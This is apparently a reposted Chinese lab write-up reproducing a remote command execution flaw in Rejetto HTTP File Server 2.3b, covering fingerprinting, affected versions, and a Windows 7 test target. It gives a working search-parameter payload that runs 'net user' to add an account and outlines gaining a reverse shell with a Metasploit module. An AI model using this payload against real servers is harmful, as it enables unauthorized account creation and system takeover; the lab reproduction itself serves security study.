目录
0x00 指纹信息
0X01 漏洞原理
0X02 影响范围
0x03 靶场搭建
0x04 漏洞复现
0x00 指纹信息
HFS浏览器页面显示服务器版本信息,如HttpFileServer 2.3b。
0X01 漏洞原理
HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
0X02 影响范围
HTTP File Server 2.3c以前的2.3x版本
0x03 靶场搭建
靶机:Windows7【192.168.160.130】
HFS:HFS2.3b 【https://sourceforge.net/projects/hfs/】
3.1 在https://sourceforge.net/projects/hfs/页面寻找低于2.3c版本,并下载。
3.2 在Windows7靶机中双击运行,可以看到网址为http://192.168.160.130/。
3.3 访问网址成功,靶场搭建完成。
0x04 漏洞复现
4.1 漏洞验证
4.1.1 检查Windows7靶机上未存在“zewa007”用户。
4.1.2 在HFS服务页面尝试进行RCE命令执行,建立“zewa007”账户。
payload:/?search==%00{.exec|cmd /c net user zewa007 123456 /add.}
4.1.3 查看信息,发现“zewa007”用户成功建立。
注意:此方法HFS客户端必须使用管理员权限运行方可成功建立账户。
4.2 MSF工具反弹shell
4.2.1 使用 exploit/windows/http/rejetto_hfs_exec 模块。
4.2.2 配置要攻击的HFS服务ip及端口。
4.2.3 进行攻击,页面返回未成功建立会,但是使用sessions -l查看,发现已建立多个会话。
4.2.4 检查会话,可以正常使用。
原文始发于微信公众号(Matrix1024):HFS远程命令执行漏洞(RCE)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论